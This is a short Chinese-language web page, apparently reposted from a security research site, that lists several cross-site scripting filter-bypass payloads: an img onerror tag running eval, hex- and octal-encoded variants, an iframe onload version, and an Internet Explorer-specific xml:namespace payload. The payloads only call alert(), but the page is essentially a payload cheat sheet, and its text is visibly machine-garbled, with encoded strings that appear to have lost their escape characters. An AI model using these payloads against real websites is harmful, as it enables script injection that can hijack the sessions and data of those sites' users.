|
|
|
联系客服020-83701501

几个bypass

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
几个bypass

几个bypass以下:

Default
1 <img src="5" onerror=eval("alert('lalala~')")></img>

变形如:

Default
1 %3Cimg%20src=%225%22%20onerror=eval%28%22x61x6cx65x72x74x28x27x78x73x73x27x29%22%29%3E%3C/img%3E

操纵Hex 编码,加之img 的错误事项 用eval 函数 操控()内的代码

Default
1 <iframe onload=eval("alert('1')")></iframe>

变形如:

Default
1 <iframe onload=eval("1411541451621645047614751")></iframe>

通过iframe,转换为16进制或8进制均可行

接下来这个是针对IE的:

Default
1234 <div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

link:http://www.fuckgcd.net/wordpress/archives/153

本文由Internet保险攻防研究室(www.91ri.org)动静保险小组收集整顿,转载请注明来由。

数安新闻+更多

证书相关+更多